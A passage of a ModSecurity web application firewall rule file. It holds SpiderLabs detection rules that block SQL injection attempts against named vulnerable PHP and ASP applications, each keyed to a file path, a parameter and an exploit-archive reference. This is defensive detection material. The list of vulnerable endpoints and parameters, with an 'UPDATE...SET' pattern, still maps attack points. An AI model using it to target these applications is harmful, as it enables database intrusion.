"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007105,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007111) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007111,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:compare/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007117,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:clear/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007123,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:adID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007129,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:aminprice/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007135) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp amaxprice UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007135,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp amaxprice UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:amaxprice/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp amaxprice UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007141) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007141,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:abedrooms/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005261) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat UPDATE SecRule REQUEST_LINE "@contains /show_owned.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005261,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22180'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005267) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005267,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22180'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE SecRule REQUEST_LINE "@contains /administration/administre2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006224,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2945'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE SecRule REQUEST_LINE "@contains /productdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3074'" SecRule &TX:'/SQL_INJECTION.*ARGS:product_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005341) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE SecRule REQUEST_LINE "@contains /style.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005341,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4054'" SecRule &TX:'/SQL_INJECTION.*ARGS:template/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007065) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE SecRule REQUEST_LINE "@contains /products.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007065,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21323'" SecRule &TX:'/SQL_INJECTION.*ARGS:partno/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE SecRule REQUEST_LINE "@contains /faq.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005086,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3234'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006818) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE SecRule REQUEST_LINE "@contains /articles.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006818,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule &TX:'/SQL_INJECTION.*ARGS:ex/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006344) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE SecRule REQUEST_LINE "@contains /vdateUsr.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006344,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23304'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE SecRule REQUEST_LINE "@contains /boxx/ShowAppendix.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005620,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:iid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref UPDATE SecRule REQUEST_LINE "@contains /question.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003851,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3943'" SecRule &TX:'/SQL_INJECTION.*ARGS:questionref/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006128,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2997'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006332,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2906'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003793) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003793,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23752'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006903,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21289'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006909) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006909,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21289'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE SecRule REQUEST_LINE "@contains /filelist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007187,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:show_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp parentid UPDATE SecRule REQUEST_LINE "@contains /filelist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007193,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp parentid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:parentid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp parentid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007199) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE SecRule REQUEST_LINE "@contains /showfile.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007199,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE SecRule REQUEST_LINE "@contains /game.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003828,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3849'" SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005151) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE SecRule REQUEST_LINE "@contains /info_user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005151,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3197'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE SecRule REQUEST_LINE "@contains /listmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004923,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22545'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE SecRule REQUEST_LINE "@contains /windows.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005080,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3233'" SecRule &TX:'/SQL_INJECTION.*ARGS:kategori_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE SecRule REQUEST_LINE "@contains /down_indir.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005377,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4057'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE SecRule REQUEST_LINE "@contains /index.cfm" 